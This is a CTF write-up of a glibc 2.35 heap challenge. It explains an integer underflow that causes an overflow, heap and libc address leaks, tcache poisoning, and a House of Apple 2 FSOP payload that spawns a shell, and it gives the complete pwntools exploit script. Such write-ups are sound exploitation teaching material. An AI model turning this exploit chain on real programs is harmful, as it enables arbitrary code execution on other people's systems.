Download the binary files here


Foreword

This was a semi-normal heap challenge, but it was my first time exploiting a heap vulnerability so there was a lot of trial-and-error to understand how the heap works. Most of this solve is intended, with two small exceptions that I’ll make note of when they come up. Overall, I would say this was a good challenge that was quite difficult (but solvable) for me; it took me a total of ~14 hours, but a lot of that was messing around with things and being quite inefficient (I told you it was my first heap challenge).

Analysis

All the pwn challenges for this competition had the source files attached, which was really nice since I could focus on the vulnerability instead of reverse-engineering this binary. Looking at the challenge file, we can already see the vulnerable line of code.

1
2
3
int read_data_into_note(int index, char *note, unsigned short size) {
    // I prevented all off-by-one's by forcing the size to be at least 7 less than what was declared by the user! I am so smart
    unsigned short resized_size = size == 8 ? (unsigned short)(size - 7) : (unsigned short)(size - 8);

If we expand the ternary out into its full if-else form:

1
2
3
4
5
unsigned short resized_size;
if (size == 8)
    resized_size = (unsigned short)(size - 7);
else
    resized_size = (unsigned short)(size - 8);

It becomes very clear that we can do an integer underflow in resized_size if our input is less than 8. We’ll use 7 since that will give us a 65535-byte write into our note.

You can look through the source yourself, but we essentially have 3 other safe functions: create_note(), delete_note(), print_note(). There is no UaF, and the malloc() in create_note() only accepts integers in the range [0,248]. There is an important limitation to this challenge, which is that we can only have 2 notes at a time.

Since we know where we’re going, we can start crafting our plan for exploit.

  1. Leak heap address
  2. Leak Libc address
  3. Build write primitive
  4. Do exploit shenanigans

What is heap? (Skip if you are already familiar)

If you’re unfamiliar with the heap, the concept can be boiled down to a section of memory where we write dynamic amounts of data to and have random access to it. Unlike the stack, there are no FILO requirements or any other restrictions on access, we can simply malloc() an address and get a writable space in memory. The downside to heap is that because it so unrestricted, exploiting it heavily depends on the implementation. There are numerous different kinds of malloc for Linux and Unix-like systems, Windows has its own, other OSs have their own, and they all function differently. The good news is that most CTF’s use the glibc ptmalloc allocator for Linux, so we’ll talk about the heap for this allocator implementation specifically.

Developing the Exploit

Because the heap is so reliant on the implementation, it is critical we know what version of glibc this binary runs. To do this, we can either run:

$> strings ./libc.so.6 | grep "^GLIBC"
[truncated]
GLIBC_2.33
GLIBC_2.34
GLIBC_2.35
GLIBC_PRIVATE
GLIBC_2.8
GLIBC_2.33
GLIBC_2.35
[truncated]

And look at the highest number printed, or use pwndbg:

pwndbg> libcinfo
libc version: 2.35
libc source link: https://ftp.gnu.org/gnu/libc/glibc-2.35.tar.gz

Both show us that this is glibc 2.35, which brings us to a great heap-exploit resource, how2heap’s glibc_2.35 collection of exploits. I didn’t end up using any of their techniques directly, but the concepts help in getting used to how heap exploits are constructed and what you might be able to do with them.

To accomplish steps 1-2 in our attack plan, we can leverage the fact that using pwntools’ send() (not sendline()) allows us to send a precise number of bytes without a newline, thus avoiding the program replacing our newline character with a null-byte. Because read() will not naturally append null-bytes, we can craft a specific-length payload where reading the note will leak adjacent memory.

### NORMAL ###
0x0000  my_input_here\x00
0x0012  critical_data_here\x00
puts(0x0000) will print "my_input_here"

### NO-NEWLINE ###
0x0000  my_input_here_
0x0012  critical_data_here\x00
puts(0x0000) will print "my_input_here_critical_data_here"

This is not initially interesting until you look at what glibc does with freed chunks. Essentially, glibc will save freed chunks into a cache so that future malloc() calls of the same size will be substantially quicker, and to do this it has a few different types of cache. For the scope of this writeup we’ll look at the two that matter to us: “tcache” and “unsorted”. These caches are more commonly referred to as “bins” so the proper names are Tcache Bin and Unsorted Bin; I’ll refer to them in shorthand hereafter.

  • Tcache: A linked list of same-sized heap chunks, up to 0x410 size and 7 members. Anything that exceeds this ends up in the…
  • Unsorted: There is only 1, and it sits in libc memory. Mostly used for moving freed chunks between bins.

Critically, tcache stores heap addresses at the freed chunk location. Where data was, there is now a heap address. Unsorted stores an address in libc’s main_arena, there is now a libc address.

Every heap chunk has roughly 4 parts when freed.

1
2
3
4
5
6
struct freed_chunk { // 64-bit
    uint64_t metadata;
    uint64_t size;
    uint64_t data_1;
    uint64_t data_2;
}

The only parameters we care about are size and data_1, but we do need to take note of them when calculating payload offsets. size is the size of the chunk, but its last 3 bits are used for flags (PREV_INUSE: 0x1, IS_MMAPPED: 0x2, NON_MAIN_ARENA: 0x4). data_1 is where the address of either the heap or libc will be stored. Since chunks are stored sequentially, we can overwrite chunks from other chunks if given an overflow, which is the crux of all our heap exploits.

If a chunk is in the cache, then requesting a malloc() for a size that fits that cached chunk will give that chunk back, which allows us to perform “heap grooming” where we malloc() specifically sized blocks of memory so that we can pick chunks almost anywhere in the heap.

Alright, onto the actual exploitation. First, we’ll setup one note of 24 bytes, then another of 36 bytes in that order. We can then free both chunks because our 36-byte is in front of our 24-byte (the 24 was allocated first!), so we need that tcache heap address in chunk 2, and we can only write to a chunk when we create it. We then write 32 A’s to overflow past the metadata and size tags of our 36-byte freed chunk, so that when we read the 24-byte note, it reads 32 A’s and the address stored for the tcache bin. This address is stored in a “secure” format in which the next freed heap chunk in our linked list is XOR’d with the address of our current freed chunk shifted right by 12 bits (to remove the non-randomized ASLR bits).

1
void *secure_chunk_addr = (&next) ^ (&current >> 12)

Conveniently, if there’s only one thing in the linked list, our next chunk is null so it happens to be just the base heap address when shifted back left 12 bits.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
r = start() # start() returns a pwntools connection

# --- Helpers ---
def create(index, size, data):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', str(index).encode())
    r.sendlineafter(b': ', str(size).encode())
    # Use send instead of sendline to avoid appending \n (which turns into \0)
    r.sendafter(b': ', data) 

def delete(index):
    r.sendlineafter(b'> ', b'2')
    r.sendlineafter(b': ', str(index).encode())

def read_note(index):
    r.sendlineafter(b'> ', b'3')
    r.sendlineafter(b': ', str(index).encode())

# --- Exploit code :) ---

log.info("Setting up initial heap...")
create(0,24,b'a')
create(1,36,b'b')
delete(0)
delete(1)

log.info("Attempting heap-leak...")
create(0, 7, b'A'*32)
read_note(0)
r.recvuntil(b'A'*32)
heap = unpack(r.recvline()[:-1].ljust(8,b'\x00')) << 12
log.success(f"Heap: {hex(heap)}")
delete(0)
log.info("Restoring heap...")
create(0, 7, flat({ # We do have to restore the heap so when we free the 36-byte we don't SEGV
	16: [0x0, 0x31]
}))
delete(1)

Now that we have our heap address, we need to leak a libc address through the unsorted bin. To get something in the unsorted bin, we must either allocate (and then free) a chunk bigger than 0x410 or put more than 7 chunks of the same size into tcache. Unfortunately, we have access to neither of those things, our program only allows 2 notes at a time and sizes no bigger than 0xf8. So what do we do?

Because of our overflow, we can modify that size parameter of an adjacent chunk and trick libc into freeing a chunk bigger than was actually there. It should be possible to modify a single chunk’s size to 0x420 then free it, but I was getting errors because of how the chunk bled into the top chunk (a pseudo-chunk used to mark the top of the heap and its remaining space, used in some attacks not covered in this writeup), so I created a bunch of chunks to move the top chunk down until I could forge a 0x4d0 chunk.

By calling malloc() for steadily increasing sizes, then freeing these chunks, we can abuse the caching system into a worst-possible scenario where two cached chunks get stored and never reused, forcing the heap to grow down. When we create this large chunk we do have to let one additional chunk stay in front of it because otherwise libc will simply consume the big chunk and merge it with the top chunk immediately, which does not put it in the unsorted bin. Once we have our heap set up, we simply use our 24-byte chunk (at the bottom of the heap, address-wise) to overflow and overwrite the size parameter. This will put our fake chunk in the unsorted bin where we can use the same technique as the heap leak to get an address in libc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
log.info("Filling heap...")
delete(0)
create(0, 48, b'a') # 0x40
create(1, 48, b'b') # 0x40
delete(1)
delete(0)
log.info("Finished Block 1")
create(0, 72, b'a') # 0x50
create(1, 72, b'b') # 0x50
delete(0)
delete(1)
log.info("Finished Block 2")
create(0, 82, b'a') # 0x60
create(1, 82, b'b') # 0x60
delete(0)
delete(1)
log.info("Finished Block 3")
create(0, 108, b'a') # 0x80
create(1, 108, b'b') # 0x80
delete(0)
delete(1)
log.info("Finished Block 4")
create(0, 122, b'a') # 0x90
create(1, 122, b'b') # 0x90
delete(0)
delete(1)
log.info("Finished Block 5")
create(0, 142, b'a') # 0xa0
create(1, 142, b'b') # 0xa0 # This is a 'guard' chunk to prevent free() from merging with top chunk
delete(0)
delete(1)
log.info("Finished Block 6")
log.info("Writing large chunk...")
# Can now create 0x4d0 chunk
create(1, 36, b'VICTIM')
create(0, 7, flat({
	0x18: 0x4d1 # Don't forget the PREV_INUSE bit!
}))
log.info("Free()'ing chunk...")
delete(1) # 0x4d0 chunk should be in unsorted bin now

log.info("Attempting libc-leak...")
delete(0)
create(0, 7, b'A'*32)
read_note(0)
r.recvuntil(b'A'*32)
leak = unpack(r.recvline()[:-1].ljust(8,b'\x00'))
libc.address = (leak-96) - libc.symbols['main_arena']
log.success(f"Libc: {hex(libc.address)}")
delete(0)

log.info("Restoring heap..")
create(0, 7, flat({
	0x18: 0x4d1
}))

And now that we have both heap and libc, we can successfully build our write primitive through a technique known as tcache poisoning. The idea is that we setup our tcache linked list, but we forge the next heap address it’s pointing to so that it points to an arbitrary location in memory. malloc() will pull that next heap chunk and return it like it was a heap address, when in actuality our note pointer now points to an address we control.

Choosing where to write is the next hardest part of this challenge. There are no RWX pages in memory so we can’t write shellcode, and once we write to this location we can’t do anything else since attempting to free this will definitely throw an error because our write location is not a heap address anymore. We’d be restricted to one note that we can’t do anything with. The method I decided to use was much more complicated than needed and likely my biggest mistake with this challenge, but I’ll detail it here since it’s a neat trick.

The location I chose to write to was the _IO_list_all struct in libc, which holds a list of FILE* pointers that the program is currently aware of, with the first being stderr. It’s used for various file stream related actions like buffering, but it is also responsible for detailing any cleanup routines (read: functions) that must be called when the program exits. If we can manufacture a fake FILE struct on the heap, then overwrite the stderr pointer to our fake FILE struct’s address, the program would call our own defined cleanup function and allow us to control program execution. This technique is referred to as FSOP, or file-stream-oriented-programming, and its major downside is that it takes a lot of space and is much harder to chain executions than ROP (but still possible even though I didn’t have to). I highly encourage reading about FSOP exploits since other sources can likely do a far better job at explaining how they work, but most of the setup is just making a legitimate-looking FILE struct so nothing complains too much but also executes the cleanup function.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
log.info("Prepping tcache poison...")
delete(0)
create(0, 200, b'BUF1') # a (0xd0)
create(1, 200, b'BUF2') # b (0xd0)
delete(0)
delete(1)
addr_a = heap | 0x2c0
addr_b = heap | 0x390

# House of Apple 2 (https://xz.aliyun.com/news/16212) <- Good source on this kind of heap exploit
# Setup Addresses
fake_file_addr = heap + 0x2a0
# We'll place the wide_data struct immediately after the FILE struct (0xd8)
wide_data_ptr = fake_file_addr + 0xe0 
# We'll place the fake vtable immediately after the wide_data struct (0xe8)
fake_vtable_ptr = wide_data_ptr + 0xe8 

# Build the _IO_FILE Structure
file_struct = FileStructure()
file_struct.flags = 0xfbad0000
file_struct._IO_read_ptr = 0xaabbccdd # Passes some internal checks
file_struct._lock = heap + 0x500 # Must point to \x00
file_struct._wide_data = wide_data_ptr
file_struct.vtable = libc.sym['_IO_wfile_jumps'] # Valid vtable
file_struct = bytearray(bytes(file_struct))
file_struct[0xc0:0xc4] = p32(1) # set mode=1

# wide_data construction
wide_data_payload = p64(0) * 3 # _IO_read_ptr, etc.
wide_data_payload += p64(0)    # _IO_write_base (Offset 0x20)
wide_data_payload += p64(1)    # _IO_write_ptr  (Offset 0x28) - Must be > base
wide_data_payload += p64(0) # 0x30
wide_data_payload += p64(0) * 22
wide_data_payload = wide_data_payload.ljust(0xe0, b'\x00')
wide_data_payload += p64(fake_vtable_ptr)

# Build the Fake Vtable
# Execution jumps to offset 0x68 of this table
fake_vtable = p64(0) * (0x68 // 8)
fake_vtable += p64(libc.address+0xebc81) # libc one_gadget

# Assemble the final block to write to heap+0x2a0
payload = bytes(file_struct) + wide_data_payload + fake_vtable
#####################################
log.info("Built payload")

log.info("Attempting stderr overwrite...")
target = libc.symbols['_IO_list_all']
log.info(f"&a = {hex(addr_a)}, &b = {hex(addr_b)}")
create(0, 7, flat({ # We have to overwrite the first and second chunks, the first is legit (mostly), the second is our poison
	0x18: [0xd1, (addr_a>>12), b'AAAAAAAA'],
	0xe8: [0xd1, (target ^ (addr_b>>12)), b'BBBBBBBB']
}, filler=b'\x00'))
delete(0)
create(0, 200, b'A') # First gives the normal heap address (we pull from the 'top' of the linked list)
create(1, 200, pack(fake_file_addr)) # Second malloc should give our poisoned libc address
log.success("Overwritten")
delete(0)
log.info("Writing file object")
create(0, 7, payload) # Write the file struct
log.info("Calling exit()...")
r.sendlineafter(b'> ', b'5') # Quit
r.recvline()
gdb('c;')
r.sendline(b'cat flag.txt') # Should have shell by this point
res = r.recvline()
if res != '':
	log.success(f"Pwned ;) ({res.decode().strip()})")
r.interactive()

After the competition had concluded, the challenge author released their exploit code, which follows the same process but instead of FSOP, they overwrite a portion of the libc GOT. Surprisingly, GLIBC versions prior to 2.39 have a writable GOT (for lazy binding and IFUNC resolutions), and since this is GLIBC 2.35, we can overwrite a function like strlen() to system() and simply call strlen("/bin/sh").

Here is the final complete solve script I used:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
from pwn import *

# Set up context
exe = ELF('./chall_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False) # Assumes standard libc, script will try to resolve
context.binary = exe
context.terminal = ['tmux', 'splitw', '-v']

def start():
    if args.REMOTE:
        return remote("chall.lac.tf", 31144)
    elif args.DOCKER:
        return remote("127.0.0.1", 5000)
    else:
        return process(exe.path)

def gdb(script: str):
	script = script.replace(';','\n')
	with context.local(log_level='warn'):
		if args.GDB:
			attach(r, gdbscript=script)

r = start()
# --- Helpers ---
def create(index, size, data):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', str(index).encode())
    r.sendlineafter(b': ', str(size).encode())
    # Use send instead of sendline to avoid appending \n (which turns into \0)
    r.sendafter(b': ', data) 

def delete(index):
    r.sendlineafter(b'> ', b'2')
    r.sendlineafter(b': ', str(index).encode())

def read_note(index):
    r.sendlineafter(b'> ', b'3')
    r.sendlineafter(b': ', str(index).encode())

log.info("Setting up initial heap...")
create(0,24,b'a')
create(1,36,b'b')
delete(0)
delete(1)

log.info("Attempting heap-leak...")
create(0, 7, b'A'*32)
read_note(0)
r.recvuntil(b'A'*32)
heap = unpack(r.recvline()[:-1].ljust(8,b'\x00')) << 12
log.success(f"Heap: {hex(heap)}")
delete(0)
log.info("Restoring heap...")
create(0, 7, flat({
	16: [0x0, 0x31]
}))
delete(1)


log.info("Filling heap...")
delete(0)
create(0, 48, b'a') # 0x40
create(1, 48, b'b') # 0x40
delete(1)
delete(0)
log.info("Finished Block 1")
create(0, 72, b'a') # 0x50
create(1, 72, b'b') # 0x50
delete(0)
delete(1)
log.info("Finished Block 2")
create(0, 82, b'a') # 0x60
create(1, 82, b'b') # 0x60
delete(0)
delete(1)
log.info("Finished Block 3")
create(0, 108, b'a') # 0x80
create(1, 108, b'b') # 0x80
delete(0)
delete(1)
log.info("Finished Block 4")
create(0, 122, b'a') # 0x90
create(1, 122, b'b') # 0x90
delete(0)
delete(1)
log.info("Finished Block 5")
create(0, 142, b'a') # 0xa0
create(1, 142, b'b') # 0xa0 # This is a 'guard' chunk to prevent free() from merging with top chunk
delete(0)
delete(1)
log.info("Finished Block 6")
log.info("Writing large chunk...")
# Can now create 0x4d0 chunk
create(1, 36, b'VICTIM')
create(0, 7, flat({
	0x18: 0x4d1
}))
log.info("Free()'ing chunk...")
delete(1)

log.info("Attempting libc-leak...")
delete(0)
create(0, 7, b'A'*32)
read_note(0)
r.recvuntil(b'A'*32)
leak = unpack(r.recvline()[:-1].ljust(8,b'\x00'))
libc.address = (leak-96) - libc.symbols['main_arena']
log.success(f"Libc: {hex(libc.address)}")
delete(0)

log.info("Restoring heap..")
create(0, 7, flat({
	0x18: 0x4d1
}))

log.info("Prepping tcache poison...")
delete(0)
create(0, 200, b'BUF1') # a (0xd0)
create(1, 200, b'BUF2') # b (0xd0)
delete(0)
delete(1)
addr_a = heap | 0x2c0
addr_b = heap | 0x390

# House of Apple 2 (https://xz.aliyun.com/news/16212)
# Setup Addresses
fake_file_addr = heap + 0x2a0
# We'll place the wide_data struct immediately after the FILE struct (0xd8)
wide_data_ptr = fake_file_addr + 0xe0 
# We'll place the fake vtable immediately after the wide_data struct (0xe8)
fake_vtable_ptr = wide_data_ptr + 0xe8 

# Build the _IO_FILE Structure
file_struct = FileStructure()
file_struct.flags = 0xfbad0000
file_struct._IO_read_ptr = 0xaabbccdd # Passes some internal checks
file_struct._lock = heap + 0x500 # Must point to \x00
file_struct._wide_data = wide_data_ptr
file_struct.vtable = libc.sym['_IO_wfile_jumps'] # Valid vtable
file_struct = bytearray(bytes(file_struct))
file_struct[0xc0:0xc4] = p32(1) # set mode=1

# wide_data construction
wide_data_payload = p64(0) * 3 # _IO_read_ptr, etc.
wide_data_payload += p64(0)    # _IO_write_base (Offset 0x20)
wide_data_payload += p64(1)    # _IO_write_ptr  (Offset 0x28) - Must be > base
wide_data_payload += p64(0) # 0x30
wide_data_payload += p64(0) * 22
wide_data_payload = wide_data_payload.ljust(0xe0, b'\x00')
wide_data_payload += p64(fake_vtable_ptr)

# Build the Fake Vtable
# Execution jumps to offset 0x68 of this table
fake_vtable = p64(0) * (0x68 // 8)
fake_vtable += p64(libc.address+0xebc81) # libc one_gadget

# Assemble the final block to write to heap+0x2a0
payload = bytes(file_struct) + wide_data_payload + fake_vtable
#####################################
log.info("Built payload")

log.info("Attempting stderr overwrite...")
target = libc.symbols['_IO_list_all']
log.info(f"&a = {hex(addr_a)}, &b = {hex(addr_b)}")
create(0, 7, flat({
	0x18: [0xd1, (addr_a>>12), b'AAAAAAAA'],
	0xe8: [0xd1, (target ^ (addr_b>>12)), b'BBBBBBBB']
}, filler=b'\x00'))
delete(0)
create(0, 200, b'A')
create(1, 200, pack(fake_file_addr))
log.success("Overwritten")
delete(0)
log.info("Writing file object")
create(0, 7, payload)
log.info("Calling exit()...")
r.sendlineafter(b'> ', b'5') # Quit
r.recvline()
gdb('c;')
r.sendline(b'cat flag.txt')
res = r.recvline()
if res != '':
	log.success(f"Pwned ;) ({res.decode().strip()})")
r.interactive()